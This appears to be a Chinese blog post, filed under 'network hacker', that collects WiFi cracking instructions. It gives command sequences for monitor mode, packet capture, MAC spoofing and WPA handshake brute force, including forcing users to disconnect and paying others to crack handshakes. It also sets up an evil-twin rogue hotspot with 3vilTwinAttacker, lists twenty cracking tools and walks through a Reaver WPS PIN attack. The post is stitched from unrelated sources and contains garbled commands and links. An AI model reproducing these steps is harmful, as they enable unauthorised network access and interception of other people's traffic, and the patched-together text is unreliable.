作者:hacker发布时间:2023-02-26分类:网络黑客浏览:88评论:5
Ess 人类可记忆 的名字(wifi名字)
Bss 无线ap 的mac地址
破解WiFi看下面 破解wpa
iwconfig
iw list
iw dev wlan0mon set channel 4 更改所在信道为4
iwlist wlan0mon channel 查看 wlan0mon 所在的信道 所在信道要与 要抓的信道在同一信道
iw dev wlan0 scan | grep SSID 扫描附 近的 ap (WiFi)
iw dev wlan0 scan | egrep "DS\ Parameter\ set|SSID" 可以筛选出在地基信道
iw dev wlan0 interface add wlan0mon type monitor 添加可以监听的网卡接口 注意wlan0, 是你自己的无线网卡 用 iwconfig 可以查看 可能是wlan1 或者 wlan2 之后就可以在 iwconfig 里看到 wlan0mon (如果看不到 尝试 关闭 service network-manager stop 服务) 然后使用 ifconfig wlan0mon 启动 ,之后就可以用wireshark 进行抓包
iw dev wlan0mon interface del 删除添加的网卡接口
service network-manager stop 首先先关闭 这个服务
airmon-ng check 可以检查出有可能冲突的进程
airmon-ng check kill 可以杀掉全部冲突进程
airmon-ng start wlan0 6 在wlan0上启动侦听 这个数字 6 就是启动在哪个信道上监听 可以不写 和上面iw的命令没有区别
iwlist wlan0mon channel 查看当前在第几信道
airmon-ng stop wlan0mon 关闭监听 然后再用 ifconfig wlan0 up 启动无线网卡 再使用 service network-manager start 进行服务启动 可以进行正常的使用
airodump-ng wlan0mon 抓包 默认抓取所有信道的 包 airodump-ng wlan0 -c 1 这个数字1 代表抓取1信道的包
airodump-ng wlan0mon -c 1 --bssid 00:11:22:33:44:55 -w filename.cap --ivs 后面这些 每一个都是可以省略的 --bssid 代表 只抓取这个 ap的包 -w 文件名 可以把抓到的包 保存成文件 --ivs 代表只抓 wep 加密的包
包注入 注意让自己和目标在同一信道
如果发包是 要伪造源地址 可以用 macchanger -m 00:11:22:33:44:55 wlan0mon 将自己的mac 地址 与要伪造的地址改成相同
aireplay-ng -9 wlan0mon 注包测试 如果不成功 可以运行 ifconfig wlan0mon up 试试
这时网络中会有两个相同mac 的设备 会有丢包
如果WiFi 只使用mac地址过滤没有密码你就可以连接上了,可以配合破解的WiFi密码 进行使用破解的WiFi密码 加上mac地址伪造连接有密码有mac绑定的 WiFi
比较简单 只要抓到足够多的包就能完全破解
思路 暴力破解
抓到一位用户的握手包
如果有用户已经连接上 可以使他断线重连 就能得到握手包(千万别傻等别人连接)
然后将大量的密码字典放进握手包里计算看看是不是对的密码 使用这种方式要用显卡跑会快很多,也可以去淘宝找人跑包
开启一个wifi热点
使用上面这个命令后 用 ifconfig -a 可以查看到 多出了一个网卡 叫 at0 下一步就是把at0 和 eth0 (就是连接外网的网卡 如果是用WiFi 就是wlan0 之类的) 桥接起来
apt-get install bridge-utils 桥接网卡工具包
桥接接口的 成员接口 就是eth0 和 at0 是不能有ip 地址的 所以分别使用
ifconfig eth0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
来启动这两个接口 IP地址是0.0.0.0
再使用
ifconfig bridge 192.168.1.10 up
给上面创建的桥接网卡 一个ip地址 并up起来 这个IP地址 使用 上面eth0 的IP地址
添加一个网关 目的是让 连接到黑客开启的WiFi 的用户可以直接到现实路由中 获取ip地址
netstat -nr
route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
启动IP 转发
echo 1 /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward 确认修改完成
git clone
cd 3vilTwinAttacker
chmod +x installer.sh
./installer.sh --install
这样就安装成功了
启动工具使用
wifi-pumpkin 不是之前的3vilTwinAttacker 看最后安装完成的命令行 红色的字 执行这个命令 在终端
二十款免费WiFi黑客(渗透测试)工具
1. Aircrack
Aircrack是目前最流行的WiFi密码破解工具。市面上能破解 WiFi加密的工具有很多,不外乎利用WEP安全漏洞或者暴力字典攻击的方式破解WPA/WPA2 PSK密码。WPA2 AES/CCMP加密依然是相对安全的选择。如果采用WPA2 PSK模式,那么你的密码长度最好是13位以上混合字符。在你的Wi-Fi网络被入侵或者“蹭网”之前,最好先用破解工具自我攻击一下。 Aircrack是一个开源的WEP/WPA/WPA2 PSK破解工具,可以运行在windows、Mac OS X、Linux和OpenBSD上。可以下载到Vmware镜像文件或Live CD文件。
下载链接:
2. AirSnort
AirSnort是另外一款流行的WLAN密码破解工具,可以破解WEP秘钥。
下载链接:
3. Kismet
Kismet是一个开源的WiFi扫描器,包嗅探器和入侵政策系统,可以在windows、Mac OSX、Linux和BSD上运行。Kismet能显示AP详细信息,包括隐藏的SSID,还能捕获原始无线数据包,还可以将数据导入 Wireshark、TCPdump等工具进行分析。在windows环境,受驱动程序限制,Kismet只能与 CACE AirPcap无线网卡配合工作。但在Mac OSX和Linux上,Kismet可以兼容很多无线网卡。
Download Kismet:
4. Cain Able
Cain和Abel是windows上的密码恢复、破解和嗅探工具,可被用于展示如何从网络中嗅探明文密码。
下载链接:
5. WireShark
WireShark是当下非常流行的网络协议分析工具,关于最新的WireShark2.0版本的新功能的信息在这里。
Download Wireshark:
6. Fern WiFi Wireless Cracker
Fern是一款优秀的网络漏洞扫描和WLAN破解工具,可以破解获取WEP/WPA/WPS秘钥。Fren的开发工作从未停顿,而且专业版还提供更多强大功能。
下载链接:
7. CoWPAtty
CoWPAtty也是一款无线密码破解工具,新版预置了包含上千个流行SSID的17万个字典文件,大大提高了破解速度,类似国内的各种WiFi钥匙应用。
下载链接:
8. Airjack
Airjack是802.11包注入工具,过去曾被用来发起DOS或中间人攻击。
下载链接:
9. WepAttack
顾名思义,WepAttack也是一个802.11WEP秘钥破解工具,同时也是一个开源的Linux工具。
下载链接:
10. NetStumbler
NetStumbler是一个运行于Windows平台的无线密码破解工具。该工具已经很久未更新,无法兼容64位Windows版本,而且会被大多数无线入侵侦测工具发现,因此适合在家练手使用。
下载链接:
11. inSSIDer
inSSIDer是Windows和Mac平台上最流行的WiFi扫描工具,曾荣获最佳开源网络软件称号,不过目前已经转为收费版本(19.99美元)
下载链接:
12. Wifiphisher
开源无线安全工具
WiFiphiser是基于MIT许可模式的开源软件,运行于Kali Linux之上。
下载链接:
13. KisMac
一个类似Kismet的工具,面向Mac平台。
下载链接:
14. Reaver
如果你使用的是无线路由器,那么你需要注意去年底发现的一个安全漏洞:很多路由器厂商提供的WPS(一键认证模式,方便用户完成路由器设备连接认证)的 PIN码可以在数小时内被破解。Reaver就是这样一个工具,Reaver是一个Linux程序,能在4-10小时内暴力破解无线路由器的WPS PIN码和WPA/WPA2 PSK密码。Reaver还提供一个方便使用的专用硬件方案:Reaver Pro,有图形web操作界面。
15. Wifite
Wifite是一个很不错的无线密码破解工具,支持通过Reaver破解WPS秘钥,运行于Linux平台。
下载链接:
16. WepDecrypt
WepDecrypt是一款适合初学者的无线密码字典攻击工具,用C语言写成,但很久没有更新了。
下载链接:
17. OmniPeek
OmniPeek是一款网络包嗅探分析工具,属于Windows平台“独占”工具。需要使用者对网络协议和数据包有较深入的了解。
下载地址:
18. CloudCracker
顾名思义,CloudCracker是一款云端WiFi密码破解工具。
下载地址:
19. CommonView for Wi-Fi
CommonView是一款流行的额网络监控和包分析工具,最大特点是拥有GUI图形界面。
下载地址:
20. Pyrit
Pyrit也是一款优秀的WiFi密码暴力破解工具(WPA/WPA2-PSK)。运行于FreeBSD、MacOS和Linux平台。
下载地址:
很多无线路由器都支持WPS(Wifi Protection Setup)功能,它是一种可以让用户无需密码直接连接Wifi的技术。本来这种技术的初衷是让用户更加方便的连接网络,但是因为它有严重的安全漏洞,所以反而让用户的网络更加不安全。因此在这里推荐大家使用路由器的时候没事就把WPS功能关掉。
因为要进行渗透测试,所以首先我先把自己路由器的WPS功能开启,当然测试结束之后别忘了关闭WPS功能。
使用前一篇文章介绍的方法安装好Kali虚拟机或者U盘系统,然后就可以准备开始了。
当然这里使用到的工具并不是只有Kali能用,其他Linux发行版也可以使用。但是还是推荐Kali,因为很多渗透测试工具都是按照安防论文的理论来实现的,很多都已经不再维护了。而Kali收集了很多尚在维护的工具分支,如果你使用其他发行版的话,可能其软件仓库中的版本还是原来的旧版本。
本文比较简单,涉及到的工具有两个,reaver和aircrack-ng。
我用的是台式机安装的Kali虚拟机系统,自然是没有无线功能的,所以需要一块无线网卡。值得称道的是现在Linux驱动非常完善了,我原来买的360无线网卡可以直接驱动成功。
连接方法也十分简单,电脑插上无线网卡,然后在VMware软件右下角找到无线网卡的图标,点击并选择连接到虚拟机,这样就大功告成了。整个系统可能会卡几秒钟,之后就正常了。
连接成功后,在Kali虚拟机中应该可以看到Wifi图标了,用lsusb命令还可以查看到无线网卡的厂商和具体型号,可以看到我的无线网卡具体型号是MT7601U。
首先输入 sudo airmon-ng 命令查看一下当前系统中的无线网卡,在Kali中这个接口名默认应该是wlan0。
然后输入下面的命令关闭可能影响网卡监听的程序,然后开启监听模式。开启完毕之后,再次输入 sudo airmon-ng ,应该就会看到这次接口名变成了wlan0mon,这样就说明成功开启了监听模式,可以进行下一步了。
输入下面的命令开始扫描附近的无线网络。
稍后应该就会显示出附近开启了WPS的所有网络了,dBm是信号大小,值越小说明信号越强,按Ctrl+C即可中断命令。如果想要查看所有网络的话,可以添加 -a 参数,它会列出所有网络(包括了未开启WPS功能的网络)。
这时候就要记下来网络的BSSID(网络Mac地址)以及ESSID(网络名称),准备好下一步的工作了。
好了,下面就可以开始正式的工作了,其实说起来原理也很简单,WPS PIN是一个8位数字密码,所以其实我们要做的就是不断的尝试,最终找到这个PIN。总共需要尝试的次数有一亿次,看起来这个数字非常大,但是在安全领域,一亿次算是一个非常小的次数了,很多加密算法要攻破甚至需要全世界所有计算机同时计算几百年。
当然要搞定WPS的PIN并不需要这么长时间,最多10来个小时就可以了,平均用时可能也就4-5个小时左右。而且一旦知道了PIN,获得WIFI密码仅需要数秒即可搞定。之后只要PIN码没有发生变化,就算WIFI密码被修改,也可以很轻松的搞定。
接下来就要轮到本文的主角登场了,这就是reaver,专门用于破解WPS Wifi网络的工具。输入 -h 参数即可查看帮助信息,这里简单列出一些我们要使用的参数。
详细参数参考reaver的帮助,并不难懂。
了解了reaver命令行的用法之后,就可以正式开始了。很多时候一次可能并不能成功,需要尝试多次。
因为是测试,所以我干脆直接指定了PIN的值。为了更详细的了解命令运行过程,可以开启2级或者3级输出看看reaver工具到底干了啥。
如果出现了下面的bad FCS,可以在添加 -F 参数忽略帧校验错误,然后再次尝试。
如果一切正常的话,应该会在几分钟内通过PIN解开WIFI的密码。如果不知道PIN密码的话,也可以通过几个小时的尝试来试出PIN进而得知WIFI密码。因此我们在日常使用的时候,一定要记得关掉WPS功能,它是很多漏洞的根源。
我不是高手,但是我可以把我知道的告诉你。
工具:电脑一台(支持wifi最好)、无线路由一个(支持中际功能最好)
下载安装BT3或者4,破WeP加密的,然后自己网上看教材。当然还可以利用CAIN嗅探破解,网上找教材。
第一类:网络渗透测试工具
网络渗透测试工具是一种可以测试连接到网络的主机/系统的工具。通用的网络渗透测试工具有ciscoAttacks、Fast-Track、Metasploit、SAPExploitation等,这些工具各有各的特点和优势。因为网络渗透测试是一个相对广泛的概念,所以上述工具也可以包括社会工程学渗透测试模块,网络渗透测试模块和无线渗透测试模块。
第二类:社会工程学渗透测试工具
社会工程学渗透测试是利用社会工程学进行渗透测试,通常利用人们行为中的弱点来达到渗透的目的。典型的社会工程学渗透测试工具有BeefXSS和HoneyPots,这些工具诱使用户访问特定的网站,获得用户的Cookie信息,达到渗透的目的。
第三类:网站渗透测试工具
网站渗透测试是对Web应用程序和相应的设备配置进行渗透测试。在进行网站渗透测试时,安全工程序必须采用非破坏性的方法来发现目标系统中的潜在漏洞。常用的网络渗透测试工具有asp-auditor、darkmysql、fimap、xsser等。
第四类:无线渗透测试工具
无线渗透测试工具是蓝牙网络和无线局域网的渗透测试。在进行无线渗透测试时,一般需要先破解目标网络的密码,或者建立虚假热点来吸引目标用户访问,然后通过其他方式控制目标系统。常见的蓝牙网络渗透测试工具有atshell、btftp、bluediving、bluemaho等;常见的无线局域网渗透测试工具有aircack-ng、airmon-ng、pcapgetiv和weakivgeng等,这些工具实现了不同的功能,可以让安全工程师通过各种方式进行无线渗透测试。
刚刚在kali NetHunter app store上找到一款贼厉害的安卓系统抓包软件,名字叫 Hijacker
下载链接:去re.nethunter.com/re掉po/中com.hijacker_3文2.apk
软件简介:Hijacker是用于渗透测试工具Aircrack-ng,Airodump-ng,MDK3和Reaver的图形用户界面。 它提供了一个简单易用的UI来使用这些工具,而无需在控制台中键入命令并复制和粘贴MAC地址。
此应用程序需要具有支持监视器模式的内部无线适配器的ARM android设备。 少数android设备可以运行,但本机都不可用。 这意味着您将需要自定义固件。 任何使用BCM4339芯片组(MSM8974,例如Nexus 5,Xperia Z1 / Z2,LG G2,LG G Flex,三星Galaxy Note 3)的设备都可以与Nexmon(也支持其他一些芯片组)一起使用。 使用BCM4330的设备可以使用bcmon。
另一种选择是使用OTG电缆在Android中使用支持监视器模式的外部适配器。
从1.1版开始,包含了armv7l和aarch64设备所需的工具。 还包括用于BCM4339和BCM4358的Nexmon驱动程序和管理实用程序。
root访问也是必要的,因为这些工具需要root才能工作。
标签:无线网渗透工具
已有5位网友发表了看法:
访客 评论于 2023-02-26 04:47:40 回复
开启的WiFi 的用户可以直接到现实路由中 获取ip地址 netstat -nr route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.1
访客 评论于 2023-02-26 06:25:50 回复
1WEP秘钥破解工具,同时也是一个开源的Linux工具。下载链接: 10. NetStumblerNetStumbler是一个运行于Windows平台的无线密码破解工具。该工具已经很
访客 评论于 2023-02-26 05:18:23 回复
细的了解命令运行过程,可以开启2级或者3级输出看看reaver工具到底干了啥。 如果出现了下面的bad FCS,可以在添加 -F 参数忽略帧校验错误,然后再次尝试。如果一切正常的话,应该会在几分钟内通过PIN解开WIFI的密码。如果不知道PIN密码的话
访客 评论于 2023-02-26 03:12:24 回复
\ Parameter\ set|SSID" 可以筛选出在地基信道 iw dev wlan0 interface add wlan0mon type monitor 添加可以监听的网卡接口 注意wlan0, 是你自己的无线网卡 用 iwconfig 可以查看 可能是wlan1
访客 评论于 2023-02-26 04:33:24 回复
ethunter.com/re掉po/中com.hijacker_3文2.apk 软件简介:Hijacker是用于渗透测试工具Aircrack-ng,Airodump-ng,MDK3